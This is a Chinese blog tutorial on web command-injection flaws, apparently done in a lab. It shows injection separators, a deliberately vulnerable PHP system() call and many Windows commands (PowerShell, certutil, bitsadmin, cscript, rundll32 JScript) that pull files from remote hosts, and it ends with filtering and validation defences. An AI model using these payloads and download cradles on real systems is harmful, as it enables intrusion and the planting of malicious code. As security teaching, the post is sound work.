<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">
<script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
<link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/uploads/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/uploads/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="WEB 安全之命令执行漏洞学习实战1.命令执行漏洞​       应用程序有时需要调用一些执行系统命令的函数,如在PHP中，使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行漏洞，这就是命令执行漏洞。 1.1 Windows管道符1234">
<meta property="og:type" content="article">
<meta property="og:title" content="WEB 安全之命令执行漏洞学习实战">
<meta property="og:url" content="http://yoursite.com/2020/03/31/WEB 安全之命令执行漏洞学习实战/index.html">
<meta property="og:site_name" content="Darren-学无止境">
<meta property="og:description" content="WEB 安全之命令执行漏洞学习实战1.命令执行漏洞​       应用程序有时需要调用一些执行系统命令的函数,如在PHP中，使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行漏洞，这就是命令执行漏洞。 1.1 Windows管道符1234">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200326160548092.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200326175432506.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327142349251.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327142438095.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327152438997.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164047328.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327163844363.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164143342.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164151976.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164403735.png">
<meta property="og:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164416957.png">
<meta property="og:updated_time" content="2020-03-31T07:57:37.960Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="WEB 安全之命令执行漏洞学习实战">
<meta name="twitter:description" content="WEB 安全之命令执行漏洞学习实战1.命令执行漏洞​       应用程序有时需要调用一些执行系统命令的函数,如在PHP中，使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行漏洞，这就是命令执行漏洞。 1.1 Windows管道符1234">
<meta name="twitter:image" content="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200326160548092.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/31/WEB 安全之命令执行漏洞学习实战/">





  <title>WEB 安全之命令执行漏洞学习实战 | Darren-学无止境</title>
  









  <script>
class Circle {
    //创建对象
    //以一个圆为对象
    //设置随机的 x，y坐标，r半径，_mx，_my移动的距离
    //this.r是创建圆的半径，参数越大半径越大
    //this._mx,this._my是移动的距离，参数越大移动
    constructor(x, y) {
        this.x = x;
        this.y = y;
        this.r = Math.random() * 10 ;
        this._mx = Math.random() ;
        this._my = Math.random() ;

    }

    //canvas 画圆和画直线
    //画圆就是正常的用canvas画一个圆
    //画直线是两个圆连线，为了避免直线过多，给圆圈距离设置了一个值，距离很远的圆圈，就不做连线处理
    drawCircle(ctx) {
        ctx.beginPath();
        //arc() 方法使用一个中心点和半径，为一个画布的当前子路径添加一条弧。
        ctx.arc(this.x, this.y, this.r, 0, 360)
        ctx.closePath();
        ctx.fillStyle = 'rgba(204, 204, 204, 0.3)';
        ctx.fill();
    }

    drawLine(ctx, _circle) {
        let dx = this.x - _circle.x;
        let dy = this.y - _circle.y;
        let d = Math.sqrt(dx * dx + dy * dy)
        if (d < 150) {
            ctx.beginPath();
            //开始一条路径，移动到位置 this.x,this.y。创建到达位置 _circle.x,_circle.y 的一条线：
            ctx.moveTo(this.x, this.y);   //起始点
            ctx.lineTo(_circle.x, _circle.y);   //终点
            ctx.closePath();
            ctx.strokeStyle = 'rgba(204, 204, 204, 0.3)';
            ctx.stroke();
        }
    }

    // 圆圈移动
    // 圆圈移动的距离必须在屏幕范围内
    move(w, h) {
        this._mx = (this.x < w && this.x > 0) ? this._mx : (-this._mx);
        this._my = (this.y < h && this.y > 0) ? this._my : (-this._my);
        this.x += this._mx / 2;
        this.y += this._my / 2;
    }
}
//鼠标点画圆闪烁变动
class currentCirle extends Circle {
    constructor(x, y) {
        super(x, y)
    }

    drawCircle(ctx) {
        ctx.beginPath();
        //注释内容为鼠标焦点的地方圆圈半径变化
        //this.r = (this.r < 14 && this.r > 1) ? this.r + (Math.random() * 2 - 1) : 2;
        this.r = 8;
        ctx.arc(this.x, this.y, this.r, 0, 360);
        ctx.closePath();
        //ctx.fillStyle = 'rgba(0,0,0,' + (parseInt(Math.random() * 100) / 100) + ')'
        ctx.fillStyle = 'rgba(255, 77, 54, 0.3)'
        ctx.fill();

    }
}
//更新页面用requestAnimationFrame替代setTimeout
window.requestAnimationFrame = window.requestAnimationFrame || window.mozRequestAnimationFrame || window.webkitRequestAnimationFrame || window.msRequestAnimationFrame;

let canvas = document.getElementById('canvas');
let ctx = canvas.getContext('2d');
let w = canvas.width = canvas.offsetWidth;
let h = canvas.height = canvas.offsetHeight;
let circles = [];
let current_circle = new currentCirle(0, 0)

let draw = function () {
    ctx.clearRect(0, 0, w, h);
    for (let i = 0; i < circles.length; i++) {
        circles[i].move(w, h);
        circles[i].drawCircle(ctx);
        for (j = i + 1; j < circles.length; j++) {
            circles[i].drawLine(ctx, circles[j])
        }
    }
    if (current_circle.x) {
        current_circle.drawCircle(ctx);
        for (var k = 1; k < circles.length; k++) {
            current_circle.drawLine(ctx, circles[k])
        }
    }
    requestAnimationFrame(draw)
}

let init = function (num) {
    for (var i = 0; i < num; i++) {
        circles.push(new Circle(Math.random() * w, Math.random() * h));
    }
    draw();
}
window.addEventListener('load', init(60));
window.onmousemove = function (e) {
    e = e || window.event;
    current_circle.x = e.clientX;
    current_circle.y = e.clientY;
}
window.onmouseout = function () {
    current_circle.x = null;
    current_circle.y = null;

};
</script>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/Darren-zl"><img style="position: absolute; top: 0; left: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_left_gray_6d6d6d.png" alt="Fork me on GitHub"></a>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Darren-学无止境</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">一天一小步，随着时间的积累，你将会发现你其实已经走了很远。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-message">
          <a href="/message/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-heart"></i> <br>
            
            留言板
          </a>
        </li>
      
        
        <li class="menu-item menu-item-photo">
          <a href="/photo/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-image"></i> <br>
            
            摄影
          </a>
        </li>
      
        
        <li class="menu-item menu-item-music">
          <a href="/music/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-music"></i> <br>
            
            音乐
          </a>
        </li>
      
        
        <li class="menu-item menu-item-welfare">
          <a href="/welfare/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-leaf"></i> <br>
            
            福利
          </a>
        </li>
      
        
        <li class="menu-item menu-item-book">
          <a href="/book/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-book"></i> <br>
            
            书单
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/31/WEB 安全之命令执行漏洞学习实战/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Darren-zl">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/uploads/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Darren-学无止境">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">WEB 安全之命令执行漏洞学习实战</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-31T13:55:34+08:00">
                2020-03-31
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-comment-o"></i>
              </span>
              
                <a href="/2020/03/31/WEB 安全之命令执行漏洞学习实战/#SOHUCS" itemprop="discussionUrl">
                  <span id="changyan_count_unit" class="post-comments-count hc-comment-count" data-xid="2020/03/31/WEB 安全之命令执行漏洞学习实战/" itemprop="commentsCount"></span>
                </a>
              
            
          

          
          
             <span id="/2020/03/31/WEB 安全之命令执行漏洞学习实战/" class="leancloud_visitors" data-flag-title="WEB 安全之命令执行漏洞学习实战">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  
                </span>
              
            </div>
          

          

        </span></div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">


      
      

      
        <h2 id="WEB-安全之命令执行漏洞学习实战"><a href="#WEB-安全之命令执行漏洞学习实战" class="headerlink" title="WEB 安全之命令执行漏洞学习实战"></a>WEB 安全之命令执行漏洞学习实战</h2><h4 id="1-命令执行漏洞"><a href="#1-命令执行漏洞" class="headerlink" title="1.命令执行漏洞"></a>1.命令执行漏洞</h4><p>​       应用程序有时需要调用一些执行系统命令的函数,如在PHP中，使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常命令中，从而造成命令执行漏洞，这就是命令执行漏洞。</p>
<h5 id="1-1-Windows管道符"><a href="#1-1-Windows管道符" class="headerlink" title="1.1 Windows管道符"></a>1.1 Windows管道符</h5><figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">“|”:直接执行后面的语句。如:ping 127.0.0.1|whoami</span><br><span class="line">“||”:如果前面执行的语句出错泽执行后面的语句，前面的语句智能为假 如：ping 2 || whoami</span><br><span class="line">“&amp;”:如果前面的语句为假则直接执行后面的语句，前面的语句可真可假 如 ping 127.0.0.1&amp;whoami</span><br><span class="line">“&amp;&amp;”:如果前面的语句为假则直接出错,也不执行后面的语句，前面的语句只能为真。例如:ping 127.0.0.1&amp;&amp;whoami</span><br></pre></td></tr></table></figure>

<h5 id="1-2-Linux管道符"><a href="#1-2-Linux管道符" class="headerlink" title="1.2 Linux管道符"></a>1.2 Linux管道符</h5><figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">“;”:执行完前面的语句再执行后面的 例如:ping 127.0.0.1;whoami</span><br><span class="line">“|”:显示后面语句的执行结果 例如:ping 127.0.0.1|whoami</span><br><span class="line">“||”:当前面的语句只能怪出错时，执行后面的语句，例如:ping 1||whoami</span><br><span class="line">“&amp;”:如果当前面的语句为假则直接执行后面的语句，前面的语句可真可假。例如:ping 127.0.0.1&amp;whoami</span><br><span class="line">“&amp;&amp;”:如果前面的语句为假则直接出错，也不执行后面的，前面的语句只能为真 例如:ping 127.0.0.1&amp;&amp;whoami</span><br></pre></td></tr></table></figure>

<h5 id="接下来用system函数进行简单的验证："><a href="#接下来用system函数进行简单的验证：" class="headerlink" title="接下来用system函数进行简单的验证："></a>接下来用system函数进行简单的验证：</h5><p>PHP代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">   <span class="keyword">echo</span> system(<span class="string">"输入"</span>,$_GET[<span class="string">'IP'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200326160548092.png" alt="image-20200326160548092"></p>
<h4 id="2-通过命令执行漏洞传输文件"><a href="#2-通过命令执行漏洞传输文件" class="headerlink" title="2.通过命令执行漏洞传输文件"></a>2.通过命令执行漏洞传输文件</h4><h5 id="2-1-通过powershell下载"><a href="#2-1-通过powershell下载" class="headerlink" title="2.1 通过powershell下载"></a>2.1 通过<strong>powershell</strong>下载</h5><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">powershell -exec bypass -c (<span class="built_in">new-object</span> System.Net.WebClient).DownloadFile(<span class="string">'http://192.168.5.109/test3.php'</span>,<span class="string">'test3.php'</span>)</span><br><span class="line"></span><br><span class="line">powershell (<span class="built_in">Invoke-WebRequest</span> http://<span class="number">192.168</span>.<span class="number">5.109</span>/test3.php -O test3.php)</span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200326175432506.png" alt="image-20200326175432506"></p>
<h5 id="2-2-也可以通过UVC读取文件"><a href="#2-2-也可以通过UVC读取文件" class="headerlink" title="2.2 也可以通过UVC读取文件"></a>2.2 也可以通过UVC读取文件</h5><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell -exec bypass -f \\webdavserver\folder\payload.ps1</span><br></pre></td></tr></table></figure>

<h5 id="2-3-通过CScript-WScript"><a href="#2-3-通过CScript-WScript" class="headerlink" title="2.3 通过CScript/WScript"></a>2.3 通过CScript/WScript</h5><p>可以执行UNC路径下的文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript //E:jscript \\webdavserver\folder\payload.txt</span><br></pre></td></tr></table></figure>

<p>通过echo写入vbs脚本，再通过cscript来执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">● <span class="built_in">echo</span> <span class="built_in">set</span> a=createobject(^<span class="string">"adod^"</span>+^<span class="string">"b.stream^"</span>):<span class="built_in">set</span> w=createobject(^<span class="string">"micro^"</span>+^<span class="string">"soft.xmlhttp^"</span>):w.open ^<span class="string">"get^"</span>,wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 &gt;&gt; c:\windows\temp\d.vbs</span><br><span class="line"></span><br><span class="line">● C:\Users\Administrator&gt;cscript c:\d.vbs http://reverse-tcp.xyz/test3.php  c:\test3.php</span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327142349251.png" alt="image-20200327142349251"></p>
<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327142438095.png" alt="image-20200327142438095"></p>
<h5 id="2-4-通过Bitsadmin"><a href="#2-4-通过Bitsadmin" class="headerlink" title="2.4 通过Bitsadmin"></a>2.4 通过Bitsadmin</h5><p><a href="https://msdn.microsoft.com/en-us/library/aa362813(v=vs.85).aspx" target="_blank" rel="noopener">bitsadmin</a>是一个命令行工具，可用于创建下载或上传工作和监测其进展情况。不支持https、ftp协议</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip</span><br><span class="line"></span><br><span class="line">bitsadmin /TRANSFER /DOWNLOAD http://download.sysinternals.com/files/PSTools.zip  E:\PSTools.zip</span><br><span class="line"></span><br><span class="line">bitsadmin /TRANSFER /DOWNLOAD \\webdavserver\folder\payload.ps1  E:\payload.ps1</span><br><span class="line"></span><br><span class="line">bitsadmin /TRANSFER /UPLOAD E:\payload.ps1 \\webdavserver\folder\payload.ps1</span><br></pre></td></tr></table></figure>

<h5 id="2-5-通过Certutil"><a href="#2-5-通过Certutil" class="headerlink" title="2.5 通过Certutil"></a>2.5 通过Certutil</h5><p>Certutil是一个命令行程序，它是作为证书服务的一部分安装的。可以使用Certutil转储并显示证书颁发机构(CA)配置信息、配置证书服务、备份和恢复CA组件，并验证证书、密钥对和证书链。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certutil -urlcache -split -f http://192.168.5.109/test3.php test3.php</span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327152438997.png" alt="image-20200327152438997"></p>
<h5 id="2-6-通过debug"><a href="#2-6-通过debug" class="headerlink" title="2.6 通过debug"></a>2.6 通过debug</h5><h5 id="2-7-通过ftp"><a href="#2-7-通过ftp" class="headerlink" title="2.7 通过ftp"></a>2.7 通过ftp</h5><p>ftp也是一种比较经典的方法，核心就是通过ftp -s:filename.txt去执行filename里边的ftp命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> open 192.168.1.123 21 &gt; ftp.txt</span><br><span class="line"><span class="built_in">echo</span> ftp&gt;&gt; ftp.txt</span><br><span class="line"><span class="built_in">echo</span> bin &gt;&gt; ftp.txt</span><br><span class="line"><span class="built_in">echo</span> ftp &gt;&gt; ftp.txt</span><br><span class="line"><span class="built_in">echo</span> GET 1.exe &gt;&gt; ftp.txt</span><br><span class="line">ftp -s:ftp.txt</span><br></pre></td></tr></table></figure>

<h5 id="2-8-通过CSC"><a href="#2-8-通过CSC" class="headerlink" title="2.8 通过CSC"></a>2.8 通过CSC</h5><p>csc.exe是微软.NET Framework 中的C#编译器，Windows系统中默认包含，可在命令行下将cs文件编译成exe</p>
<p>当然思路还是将cs文件echo写入目标系统</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> using System.Net;class WebDL &#123; static void Main(string[] args)&#123;System.Net.WebClient client = new WebClient();client.DownloadFile(args[0],args[1]);&#125;&#125; &gt; D:\<span class="built_in">test</span>\dl.cs</span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164047328.png" alt="image-20200327164047328"></p>
<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327163844363.png" alt="image-20200327163844363"></p>
<p>然后调用csc.exe编译cs文件并执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.  c:\windows\microsoft.net\framework\v3.5\csc /out:D:\<span class="built_in">test</span>\dl.exe   D:\<span class="built_in">test</span>\dl.cs</span><br><span class="line">2.  D:\<span class="built_in">test</span>\dl.exe http://192.168.5.109/1.bat D:\<span class="built_in">test</span>\1.bat</span><br></pre></td></tr></table></figure>

<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164143342.png" alt="image-20200327164143342"></p>
<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164151976.png" alt="image-20200327164151976"></p>
<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164403735.png" alt="image-20200327164403735"></p>
<p><img src="https://boke-1259222504.cos.ap-shanghai.myqcloud.com/boke/image-20200327164416957.png" alt="image-20200327164416957"></p>
<h5 id="2-9-通过JScript"><a href="#2-9-通过JScript" class="headerlink" title="2.9 通过JScript"></a>2.9 通过JScript</h5><p>以下就是一个js的downloader，和vbs的一样可以直接echo写入服务器执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">varObject = WScript.CreateObject(<span class="string">"MSXML2.XMLHTTP"</span>);Object.open(<span class="string">"GET"</span>,<span class="string">"http://192.168.5.109/1.bat"</span>,<span class="literal">false</span>);Object.send();<span class="keyword">if</span>(Object.Status == 200)&#123;varStream = WScript.CreateObject(<span class="string">"ADODB.Stream"</span>);Stream.Open();Stream.Type = 1;Stream.Write(Object.ResponseBody);Stream.SaveToFile(<span class="string">"D:\test\1.bat"</span>, 2);Stream.Close();&#125;</span><br></pre></td></tr></table></figure>

<p>也可以配合rundll32一句话完成下载</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rundll32.exe javascript:<span class="string">"\..\mshtml,RunHTMLApplication "</span>;document.write();Object=new%20ActiveXObject(<span class="string">"Microsoft.XMLHTTP"</span>);Object.open(<span class="string">"GET"</span>,<span class="string">"http://192.168.5.109/1.bat"</span>,<span class="literal">false</span>);Object.send();<span class="keyword">if</span>(Object.Status==200)&#123;Stream=new%20ActiveXObject(<span class="string">"ADODB.Stream"</span>);Stream.Open();Stream.Type=1;Stream.Write(Object.ResponseBody);Stream.SaveToFile(<span class="string">"D:\test\1.bat"</span>,2);Stream.Close();&#125;</span><br></pre></td></tr></table></figure>

<h4 id="3-对命令执行输入口过滤，杜绝命令执行问题"><a href="#3-对命令执行输入口过滤，杜绝命令执行问题" class="headerlink" title="3.对命令执行输入口过滤，杜绝命令执行问题"></a>3.对命令执行输入口过滤，杜绝命令执行问题</h4><h5 id="3-1-特殊字符过滤"><a href="#3-1-特殊字符过滤" class="headerlink" title="3.1 特殊字符过滤"></a>3.1 特殊字符过滤</h5><p>首先输入以及输出界面需要过滤不必要的特殊字符，如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[<span class="number">1</span>] |（竖线符号） [<span class="number">2</span>] &amp; （&amp; 符号） [<span class="number">3</span>];（分号） [<span class="number">4</span>] $（美元符号）[<span class="number">5</span>] %（百分比符号） [<span class="number">6</span>] @（at 符号） [<span class="number">7</span>] <span class="string">'（单引号）[8] "（引号）[9] \'（反斜杠转义单引号）[10] \"（反斜杠转义引号） [11] &lt;&gt;（尖括号） [12] ()（括号）[13] +（加号）[14] CR（回车符，ASCII 0x0d） [15] LF（换行，ASCII 0x0a）[16] ,（逗号）[17] \（反斜杠）</span></span><br></pre></td></tr></table></figure>

<h5 id="3-2-限制危险参数"><a href="#3-2-限制危险参数" class="headerlink" title="3.2 限制危险参数"></a>3.2 限制危险参数</h5><p>限制一些危险的函数，如可以调用外部程序的函数：</p>
<p>如：<code>system()</code>、<code>exec()</code>、<code>shell_exec()</code>、<code>eval()</code>、<code>passthru()</code>，代码未对用户可控参数做过滤，当用户能控制这些函数中的参数时，就可以将恶意系统命令拼接到正常命令中，从而造成命令执行攻击。</p>
<h5 id="3-3-杜绝系统层漏洞以及第三方组件漏洞。"><a href="#3-3-杜绝系统层漏洞以及第三方组件漏洞。" class="headerlink" title="3.3 杜绝系统层漏洞以及第三方组件漏洞。"></a>3.3 杜绝系统层漏洞以及第三方组件漏洞。</h5><p>如： bash破壳漏洞(CVE-2014-6271) 、WordPress中用来处理图片的ImageMagick组件、JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy等)、ThinkPHP命令执行;</p>
<h5 id="3-4-针对真实项目情况，选择不同的函数"><a href="#3-4-针对真实项目情况，选择不同的函数" class="headerlink" title="3.4 针对真实项目情况，选择不同的函数"></a>3.4 针对真实项目情况，选择不同的函数</h5><p>如DVWA命令执行模块中，不可注入的代码中，有如下一段代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( ( is_numeric( $octet[<span class="number">0</span>] ) ) &amp;&amp; ( is_numeric( $octet[<span class="number">1</span>] ) ) &amp;&amp; ( is_numeric( $octet[<span class="number">2</span>] ) ) &amp;&amp; ( is_numeric( $octet[<span class="number">3</span>] ) ) &amp;&amp; ( sizeof( $octet ) == <span class="number">4</span> ) ) &#123;</span><br><span class="line">        <span class="comment">// If all 4 octets are int's put the IP back together.</span></span><br><span class="line">$target = $octet[<span class="number">0</span>] . <span class="string">'.'</span> . $octet[<span class="number">1</span>] . <span class="string">'.'</span> . $octet[<span class="number">2</span>] . <span class="string">'.'</span> . $octet[<span class="number">3</span>];</span><br></pre></td></tr></table></figure>

<p>这是一段IP地址输入的接口，做了以上的防过滤。限制了输入的类型必须是首先必须是数字类然后用（.）进行拼接。所以当针对特定项目的时候可以采用特定的函数进行限制。</p>
<h4 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h4><p>DVWA</p>
